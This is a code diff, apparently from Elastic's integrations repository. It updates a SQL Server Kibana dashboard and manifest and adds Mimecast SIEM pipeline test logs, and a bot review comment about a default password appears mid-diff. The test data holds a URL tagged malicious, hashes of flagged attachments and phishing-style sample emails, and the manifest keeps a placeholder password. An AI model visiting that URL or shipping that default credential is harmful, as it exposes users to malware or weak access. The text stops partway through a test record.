+++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwNCwxXQ==", "attributes": { "description": "A dashboard with key metrics about a Microsoft SQL Server instance performance", "hits": 0, @@ -18,6 +29,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "733a1dbb-abdd-45d9-a908-026db7545a29", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "733a1dbb-abdd-45d9-a908-026db7545a29", "embeddableConfig": { "attributes": { "references": [ @@ -29,7 +50,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c298fa42-a98b-441a-8fc4-7e829887f213": { "columnOrder": [ @@ -123,19 +144,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "User Connections [Metrics Microsoft SqlServer]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "733a1dbb-abdd-45d9-a908-026db7545a29", + "i": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", "w": 24, - "x": 0, + "x": 24, "y": 0 }, - "panelIndex": "733a1dbb-abdd-45d9-a908-026db7545a29", - "title": "User Connections [Metrics Microsoft SqlServer]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", "embeddableConfig": { "attributes": { "references": [ @@ -147,7 +168,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "1ef8ef96-34a6-4ed3-915c-44e3f187e683": { "columnOrder": [ 
@@ -239,19 +260,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Batch Requests/sec [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", + "i": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", "w": 24, - "x": 24, - "y": 0 + "x": 0, + "y": 15 }, - "panelIndex": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", - "title": "Batch Requests/sec [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", "embeddableConfig": { "attributes": { "references": [ @@ -263,7 +284,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "f37f21be-12f6-4e30-b8e4-de8e37889cc6": { "columnOrder": [ @@ -357,19 +378,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Lock Waits/sec [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", + "i": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", "w": 24, - "x": 0, + "x": 24, "y": 15 }, - "panelIndex": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", - "title": "Lock Waits/sec [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", "embeddableConfig": { "attributes": { "references": [ @@ -381,7 +402,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c804f10c-9dee-4bc5-b3ca-2a4b900f925d": { "columnOrder": [ 
@@ -475,19 +496,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Buffer Cache Hit Ratio [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", + "i": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", "w": 24, - "x": 24, - "y": 15 + "x": 0, + "y": 30 }, - "panelIndex": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", - "title": "Buffer Cache Hit Ratio [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", "embeddableConfig": { "attributes": { "references": [ @@ -499,7 +520,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "3619ed84-0368-47cc-aa48-6edc35465d9c": { "columnOrder": [ @@ -593,28 +614,13 @@ "hidePanelTitles": false, "type": "lens" }, - "gridData": { - "h": 15, - "i": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", - "w": 24, - "x": 0, - "y": 30 - }, - "panelIndex": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", - "title": "Transactions [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" + "title": "Transactions [Microsoft SQL Server]" } ], "timeRestore": false, "title": "[Metrics Microsoft SQL Server] Performance", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ { "id": "metrics-*", @@ -642,5 +648,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/manifest.yml b/packages/microsoft_sqlserver/manifest.yml index 7c53f4a8839..927f1e11c02 100644 --- a/packages/microsoft_sqlserver/manifest.yml +++ b/packages/microsoft_sqlserver/manifest.yml 
@@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_sqlserver title: "Microsoft SQL Server" -version: "2.4.0" +version: "2.5.0" description: Collect events from Microsoft SQL Server with Elastic Agent type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -63,6 +63,7 @@ policy_templates: required: true show_user: true default: verysecurepassword + secret: true description: "Use URL encoding for passwords with special characters" - name: username type: text diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml index 497a8643329..9feaa59e016 100644 --- a/packages/mimecast/changelog.yml +++ b/packages/mimecast/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.24.0" + changes: + - description: Log processing stage and improve document fingerprinting. + type: enhancement + link: https://github.com/elastic/integrations/pull/9078 +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/mimecast/data_stream/archive_search_logs/sample_event.json b/packages/mimecast/data_stream/archive_search_logs/sample_event.json index 4fe4c38d936..331466d21e5 100644 --- a/packages/mimecast/data_stream/archive_search_logs/sample_event.json +++ b/packages/mimecast/data_stream/archive_search_logs/sample_event.json 
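Review bot: The password variable in the `@@ -63,6 +63,7 @@` hunk is now `secret: true` but still carries `default: verysecurepassword`, so a policy satisfies `required: true` without the operator ever entering a credential and that placeholder becomes the stored secret. Unless the default exists only for the package's own test fixtures, remove the `default:` line so Fleet forces an explicit value and keep the sample credential in the `_dev` deployment config; if it must stay, mark it with `# placeholder for package system tests only; never use in production`. The variable's `name:` line and the rest of the `vars` list sit above the hunk, so I cannot confirm which input it belongs to. The `kibana.version` bump to `"^8.12.0"` in the earlier hunk appears to be what gates the `secret` feature, and the 2.5.0 changelog entry does not mention that the minimum stack version has risen.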
@@ -1,11 +1,11 @@ { "@timestamp": "2021-03-18T18:35:49.000Z", "agent": { - "ephemeral_id": "ef42d9ea-67ec-4494-bad4-9d47b9ed68d2", - "id": "f81bb806-77be-4e89-9f08-d426b37fd611", + "ephemeral_id": "33b422bb-ff57-4039-80c8-23c64e5f54d7", + "id": "5e5700e6-bb04-40f9-b6fc-e5adb94ec6b5", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.archive_search_logs", @@ -59,4 +59,4 @@ "email": "admin_dhamilton@hapi1.hamilton321.net", "name": "admin_dhamilton" } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/audit_events/sample_event.json b/packages/mimecast/data_stream/audit_events/sample_event.json index 0bb1d5bdf95..33b75ad97fd 100644 --- a/packages/mimecast/data_stream/audit_events/sample_event.json +++ b/packages/mimecast/data_stream/audit_events/sample_event.json @@ -52,4 +52,4 @@ "email": "johndoe@example.com", "name": "johndoe" } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/dlp_logs/sample_event.json b/packages/mimecast/data_stream/dlp_logs/sample_event.json index 01335099301..8a938af34f2 100644 --- a/packages/mimecast/data_stream/dlp_logs/sample_event.json +++ b/packages/mimecast/data_stream/dlp_logs/sample_event.json @@ -54,4 +54,4 @@ "forwarded", "mimecast-dlp-logs" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log new file mode 100644 index 00000000000..7494f072312 --- /dev/null +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log 
@@ -0,0 +1,11 @@ +{"Act":"Acc","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","Dir":"Internal","IP":"81.2.69.144","MsgId":"","Rcpt":"auser@mimecast.com","Sender":"from@mimecast.com","SpamInfo":"[]","SpamLimit":0,"SpamProcessingDetail":{"spf":{"info":"SPF_FAIL","allow":true},"dkim":{"info":"DKIM_UNKNOWN","allow":true}},"SpamScore":1,"Subject":"message subject","TlsVer":"TLSv1","aCode":"7O7I7MvGP1mj8plHRDuHEA","acc":"C0A0","datetime":"2017-05-26T16:47:41+0100","headerFrom":"from@mimecast.com"} +{"Act":"Acc","AttCnt":2,"AttNames":"\"filename.docx\", \"filename2.xlsx\"","AttSize":1267,"MsgId":"messageId@mssageId","MsgSize":2116,"aCode":"BY81J52RPjSmp7MrubnlZg","acc":"C0A0","datetime":"2017-05-26T19:36:48+0100"} +{"Act":"Acc","AttCnt":0,"AttNames":"","AttSize":0,"MsgId":"messageId@mssageId","MsgSize":2116,"aCode":"BY81J52RPjSmp7MrubnlZg","acc":"C0A0","datetime":"2017-05-26T19:36:48+0100"} +{"Act":"Hld","AttCnt":0,"AttNames":"","AttSize":0,"Hld":"Spm","IPInternalName":"false","IPNewDomain":"false","IPReplyMismatch":"false","IPSimilarDomain":"false","IPThreadDict":"false","MsgId":"messageId@mssageId","MsgSize":56442,"aCode":"015vTYvNN-Wn30v7M5MzNw","acc":"C0A0","datetime":"2017-05-26T19:24:18+0100"} +{"AttCnt":0,"AttSize":0,"Attempt":1,"Cphr":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","Delivered":true,"Dir":"Inbound","IP":"81.2.69.144","Latency":5618,"MsgId":"messageId@mssageId","Rcpt":"auser@mimecast.com","ReceiptAck":"250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery","Route":"Mimecast Exchange Rout","Sender":"from@domain.com","Snt":28237,"Subject":"Auto Reply","TlsVer":"TLSv1","UseTls":"Yes","aCode":"9q_HeIHHPYejZTBsnipWmQ","acc":"C0A0","datetime":"2017-05-26T19:40:33+0100"} 
+{"CustomerIP":"true","IP":"0.0.0.0","MimecastIP":"false","MsgId":"<85485.121030516250700527@mta.uk.somewhere.tld>","Recipient":"recipient@recipientdomain.tld","Route":"Inbound","Sender":"8jy0xzfjymioyjfjrajc@senderdomain.tld","SenderDomain":"senderdomain.tld","SenderDomainInternal":"false","Size":1648832,"Subject":"Invoice Attached for payment","Virus":"Anomali:Phishing","acc":"C0A0","datetime":"2021-03-05T16:25:17+0000","fileExt":"xlsm","fileMime":"application/vnd.ms-excel.sheet.macroEnabled.12","fileName":"Invoice Attached for payment","md5":"4dbe9dbfb53438d9ce410535355cd973","sha1":"816b013c8be6e5708690645964b5d442c085041e","sha256":"efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12"} +{"MsgId":"","Recipient":"recipient@adomain.tld","Route":"Inbound","Sender":"sender@domain.tld","SenderDomain":"bdomain.tld","SourceIP":"0.0.0.0","Subject":"Opportunity to become VP","aCode":"azYwczFKNga_v1sYBuJOvA","acc":"C0A0","datetime":"2021-03-05T18:18:39+0000","headerFrom":"sender@adomain"} +{"MsgId":"","Recipient":"recipient@domain.tld","Route":"Internal","ScanResultInfo":"Blocked URL Category","Sender":"sender@domain.tld","Subject":"Coffee Briefing","URL":"https://domain.com/login/","UrlCategory":"Phishing & Fraud","aCode":"vit87EEXMPaEyl22Lrb92A","acc":"C46A75","datetime":"2021-03-04T21:31:08+0000"} +{"Action":"Hold","CustomName":"false","CustomThreatDictionary":"false","Definition":"Default Impersonation Definition","Hits":"1","IP":"0.0.0.0","InternalName":"true","MsgId":"","NewDomain":"false","Recipient":"recipient@domain","ReplyMismatch":"false","Route":"Inbound","Sender":"sender@domain","SimilarCustomExternalDomain":"false","SimilarInternalDomain":"false","SimilarMimecastExternalDomain":"false","Subject":"Opportunity to become VP","TaggedExternal":"false","TaggedMalicious":"true","ThreatDictionary":"false","aCode":"q4qBpkoTOt-iStR7G44w3g","acc":"C0A0","datetime":"2020-07-27T00:39:59+0100"} 
+{"acc":"C0A0","datetime":"2017-05-26T19:22:37+0100","reason":"malicious","recipient":"auser@mimecast.com","route":"inbound","sender":"from@domain.com","senderDomain":"domain.com","sourceIp":"81.2.69.144","url":"http://bgmtechnology.com.au","urlCategory":"Blocked"} +{"IP":"81.2.69.144","Recipient":"auser@mimecast.com","Route":"Inbound","Sender":"from@domain.com","SenderDomain":"domain.com","Size":378368,"acc":"C1A1","datetime":"2017-05-23T21:45:21+0100","fileExt":"doc","fileMime":"application/vnd.ms-office","fileName":"1XCOLUMN.PVC","md5":"7b52770644da336a9a59141c80807f37","sha1":"a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2","sha256":"8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83"} diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json new file mode 100644 index 00000000000..5a6cb131f62 --- /dev/null +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json 
@@ -0,0 +1,535 @@ +{ + "expected": [ + { + "@timestamp": "2017-05-26T15:47:41.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "direction": "internal", + "from": { + "address": [ + "from@mimecast.com" + ] + }, + "local_id": "7O7I7MvGP1mj8plHRDuHEA", + "message_id": "", + "subject": "message subject", + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "action": "Acc", + "created": "2017-05-26T16:47:41+0100", + "original": "{\"Act\":\"Acc\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\",\"Dir\":\"Internal\",\"IP\":\"81.2.69.144\",\"MsgId\":\"\",\"Rcpt\":\"auser@mimecast.com\",\"Sender\":\"from@mimecast.com\",\"SpamInfo\":\"[]\",\"SpamLimit\":0,\"SpamProcessingDetail\":{\"spf\":{\"info\":\"SPF_FAIL\",\"allow\":true},\"dkim\":{\"info\":\"DKIM_UNKNOWN\",\"allow\":true}},\"SpamScore\":1,\"Subject\":\"message subject\",\"TlsVer\":\"TLSv1\",\"aCode\":\"7O7I7MvGP1mj8plHRDuHEA\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T16:47:41+0100\",\"headerFrom\":\"from@mimecast.com\"}", + "outcome": "unknown" + }, + "mimecast": { + "SpamInfo": "[]", + "SpamLimit": 0, + "SpamProcessingDetail": { + "dkim": { + "allow": true, + "info": "DKIM_UNKNOWN" + }, + "spf": { + "allow": true, + "info": "SPF_FAIL" + } + }, + "SpamScore": 1, + "acc": "C0A0", + "log_type": "receipt" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "tls": { + "cipher": "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "version": "TLSv1" + } + }, + { + "@timestamp": "2017-05-26T18:36:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "name": "\"filename.docx\", \"filename2.xlsx\"", + "size": 1267 + } + }, + "local_id": "BY81J52RPjSmp7MrubnlZg", + "message_id": 
"messageId@mssageId" + }, + "event": { + "action": "Acc", + "created": "2017-05-26T19:36:48+0100", + "original": "{\"Act\":\"Acc\",\"AttCnt\":2,\"AttNames\":\"\\\"filename.docx\\\", \\\"filename2.xlsx\\\"\",\"AttSize\":1267,\"MsgId\":\"messageId@mssageId\",\"MsgSize\":2116,\"aCode\":\"BY81J52RPjSmp7MrubnlZg\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:36:48+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "AttCnt": 2, + "MsgSize": 2116, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:36:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "local_id": "BY81J52RPjSmp7MrubnlZg", + "message_id": "messageId@mssageId" + }, + "event": { + "action": "Acc", + "created": "2017-05-26T19:36:48+0100", + "original": "{\"Act\":\"Acc\",\"AttCnt\":0,\"AttNames\":\"\",\"AttSize\":0,\"MsgId\":\"messageId@mssageId\",\"MsgSize\":2116,\"aCode\":\"BY81J52RPjSmp7MrubnlZg\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:36:48+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "AttCnt": 0, + "MsgSize": 2116, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:24:18.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "local_id": "015vTYvNN-Wn30v7M5MzNw", + "message_id": "messageId@mssageId" + }, + "event": { + "action": "Hld", + "created": "2017-05-26T19:24:18+0100", + "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":\"\",\"AttSize\":0,\"Hld\":\"Spm\",\"IPInternalName\":\"false\",\"IPNewDomain\":\"false\",\"IPReplyMismatch\":\"false\",\"IPSimilarDomain\":\"false\",\"IPThreadDict\":\"false\",\"MsgId\":\"messageId@mssageId\",\"MsgSize\":56442,\"aCode\":\"015vTYvNN-Wn30v7M5MzNw\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:24:18+0100\"}", + "outcome": "unknown", + "reason": "Spm" + }, + 
"mimecast": { + "AttCnt": 0, + "IPInternalName": "false", + "IPNewDomain": "false", + "IPReplyMismatch": "false", + "IPSimilarDomain": "false", + "IPThreadDict": "false", + "MsgSize": 56442, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:40:33.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "direction": "inbound", + "from": { + "address": [ + "from@domain.com" + ] + }, + "local_id": "9q_HeIHHPYejZTBsnipWmQ", + "message_id": "messageId@mssageId", + "subject": "Auto Reply", + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-26T19:40:33+0100", + "original": "{\"AttCnt\":0,\"AttSize\":0,\"Attempt\":1,\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\",\"Delivered\":true,\"Dir\":\"Inbound\",\"IP\":\"81.2.69.144\",\"Latency\":5618,\"MsgId\":\"messageId@mssageId\",\"Rcpt\":\"auser@mimecast.com\",\"ReceiptAck\":\"250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery\",\"Route\":\"Mimecast Exchange Rout\",\"Sender\":\"from@domain.com\",\"Snt\":28237,\"Subject\":\"Auto Reply\",\"TlsVer\":\"TLSv1\",\"UseTls\":\"Yes\",\"aCode\":\"9q_HeIHHPYejZTBsnipWmQ\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:40:33+0100\"}", + "outcome": "success" + }, + "mimecast": { + "AttCnt": 0, + "Attempt": 1, + "Latency": 5618, + "ReceiptAck": "250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery", + "Route": "Mimecast Exchange Rout", + "Snt": 28237, + "acc": "C0A0", + "log_type": "delivery" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "tls": { + "cipher": 
"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "established": true, + "version": "TLSv1" + } + }, + { + "@timestamp": "2021-03-05T16:25:17.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "extension": "xlsm", + "hash": { + "md5": "4dbe9dbfb53438d9ce410535355cd973", + "sha1": "816b013c8be6e5708690645964b5d442c085041e", + "sha256": "efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12" + }, + "mime_type": "application/vnd.ms-excel.sheet.macroEnabled.12", + "name": "Invoice Attached for payment", + "size": 1648832 + } + }, + "from": { + "address": [ + "8jy0xzfjymioyjfjrajc@senderdomain.tld" + ] + }, + "message_id": "<85485.121030516250700527@mta.uk.somewhere.tld>", + "subject": "Invoice Attached for payment", + "to": { + "address": [ + "recipient@recipientdomain.tld" + ] + } + }, + "event": { + "created": "2021-03-05T16:25:17+0000", + "original": "{\"CustomerIP\":\"true\",\"IP\":\"0.0.0.0\",\"MimecastIP\":\"false\",\"MsgId\":\"<85485.121030516250700527@mta.uk.somewhere.tld>\",\"Recipient\":\"recipient@recipientdomain.tld\",\"Route\":\"Inbound\",\"Sender\":\"8jy0xzfjymioyjfjrajc@senderdomain.tld\",\"SenderDomain\":\"senderdomain.tld\",\"SenderDomainInternal\":\"false\",\"Size\":1648832,\"Subject\":\"Invoice Attached for payment\",\"Virus\":\"Anomali:Phishing\",\"acc\":\"C0A0\",\"datetime\":\"2021-03-05T16:25:17+0000\",\"fileExt\":\"xlsm\",\"fileMime\":\"application/vnd.ms-excel.sheet.macroEnabled.12\",\"fileName\":\"Invoice Attached for payment\",\"md5\":\"4dbe9dbfb53438d9ce410535355cd973\",\"sha1\":\"816b013c8be6e5708690645964b5d442c085041e\",\"sha256\":\"efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12\"}", + "outcome": "unknown" + }, + "mimecast": { + "CustomerIP": "true", + "MimecastIP": "false", + "Recipient": "recipient@recipientdomain.tld", + "Route": "Inbound", + "SenderDomainInternal": "false", + "Virus": "Anomali:Phishing", + "acc": "C0A0", + "log_type": "avlog" + }, + "source": { + "domain": 
"senderdomain.tld", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-03-05T18:18:39.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@adomain", + "sender@domain.tld" + ] + }, + "local_id": "azYwczFKNga_v1sYBuJOvA", + "message_id": "", + "subject": "Opportunity to become VP", + "to": { + "address": [ + "recipient@adomain.tld" + ] + } + }, + "event": { + "created": "2021-03-05T18:18:39+0000", + "original": "{\"MsgId\":\"\",\"Recipient\":\"recipient@adomain.tld\",\"Route\":\"Inbound\",\"Sender\":\"sender@domain.tld\",\"SenderDomain\":\"bdomain.tld\",\"SourceIP\":\"0.0.0.0\",\"Subject\":\"Opportunity to become VP\",\"aCode\":\"azYwczFKNga_v1sYBuJOvA\",\"acc\":\"C0A0\",\"datetime\":\"2021-03-05T18:18:39+0000\",\"headerFrom\":\"sender@adomain\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "recipient@adomain.tld", + "Route": "Inbound", + "acc": "C0A0", + "log_type": "spam" + }, + "source": { + "domain": "bdomain.tld", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-03-04T21:31:08.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@domain.tld" + ] + }, + "local_id": "vit87EEXMPaEyl22Lrb92A", + "message_id": "", + "subject": "Coffee Briefing", + "to": { + "address": [ + "recipient@domain.tld" + ] + } + }, + "event": { + "created": "2021-03-04T21:31:08+0000", + "original": "{\"MsgId\":\"\",\"Recipient\":\"recipient@domain.tld\",\"Route\":\"Internal\",\"ScanResultInfo\":\"Blocked URL Category\",\"Sender\":\"sender@domain.tld\",\"Subject\":\"Coffee Briefing\",\"URL\":\"https://domain.com/login/\",\"UrlCategory\":\"Phishing & Fraud\",\"aCode\":\"vit87EEXMPaEyl22Lrb92A\",\"acc\":\"C46A75\",\"datetime\":\"2021-03-04T21:31:08+0000\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "recipient@domain.tld", + "Route": "Internal", + "ScanResultInfo": "Blocked URL 
Category", + "UrlCategory": "Phishing & Fraud", + "acc": "C46A75", + "log_type": "internal-email-protect" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "full": "https://domain.com/login/" + } + }, + { + "@timestamp": "2020-07-26T23:39:59.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@domain" + ] + }, + "local_id": "q4qBpkoTOt-iStR7G44w3g", + "message_id": "", + "subject": "Opportunity to become VP", + "to": { + "address": [ + "recipient@domain" + ] + } + }, + "event": { + "action": "Hold", + "created": "2020-07-27T00:39:59+0100", + "original": "{\"Action\":\"Hold\",\"CustomName\":\"false\",\"CustomThreatDictionary\":\"false\",\"Definition\":\"Default Impersonation Definition\",\"Hits\":\"1\",\"IP\":\"0.0.0.0\",\"InternalName\":\"true\",\"MsgId\":\"\",\"NewDomain\":\"false\",\"Recipient\":\"recipient@domain\",\"ReplyMismatch\":\"false\",\"Route\":\"Inbound\",\"Sender\":\"sender@domain\",\"SimilarCustomExternalDomain\":\"false\",\"SimilarInternalDomain\":\"false\",\"SimilarMimecastExternalDomain\":\"false\",\"Subject\":\"Opportunity to become VP\",\"TaggedExternal\":\"false\",\"TaggedMalicious\":\"true\",\"ThreatDictionary\":\"false\",\"aCode\":\"q4qBpkoTOt-iStR7G44w3g\",\"acc\":\"C0A0\",\"datetime\":\"2020-07-27T00:39:59+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "CustomName": "false", + "CustomThreatDictionary": "false", + "Hits": "1", + "InternalName": "true", + "Recipient": "recipient@domain", + "ReplyMismatch": "false", + "Route": "Inbound", + "SimilarCustomExternalDomain": "false", + "SimilarInternalDomain": "false", + "SimilarMimecastExternalDomain": "false", + "TaggedExternal": "false", + "TaggedMalicious": "true", + "ThreatDictionary": "false", + "acc": "C0A0", + "log_type": "impersonation-protect" + }, + "rule": { + "name": "Default Impersonation Definition" + }, + "source": { + "domain": "false", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + 
"@timestamp": "2017-05-26T18:22:37.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "from@domain.com" + ] + }, + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-26T19:22:37+0100", + "original": "{\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:22:37+0100\",\"reason\":\"malicious\",\"recipient\":\"auser@mimecast.com\",\"route\":\"inbound\",\"sender\":\"from@domain.com\",\"senderDomain\":\"domain.com\",\"sourceIp\":\"81.2.69.144\",\"url\":\"http://bgmtechnology.com.au\",\"urlCategory\":\"Blocked\"}", + "outcome": "unknown", + "reason": "malicious" + }, + "mimecast": { + "acc": "C0A0", + "log_type": "url-protect", + "urlCategory": "Blocked" + }, + "source": { + "domain": "domain.com", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "full": "http://bgmtechnology.com.au" + } + }, + { + "@timestamp": "2017-05-23T20:45:21.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "extension": "doc", + "hash": { + "md5": "7b52770644da336a9a59141c80807f37", + "sha1": "a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2", + "sha256": "8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83" + }, + "mime_type": "application/vnd.ms-office", + "name": "1XCOLUMN.PVC", + "size": 378368 + } + }, + "from": { + "address": [ + "from@domain.com" + ] + }, + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-23T21:45:21+0100", + "original": 
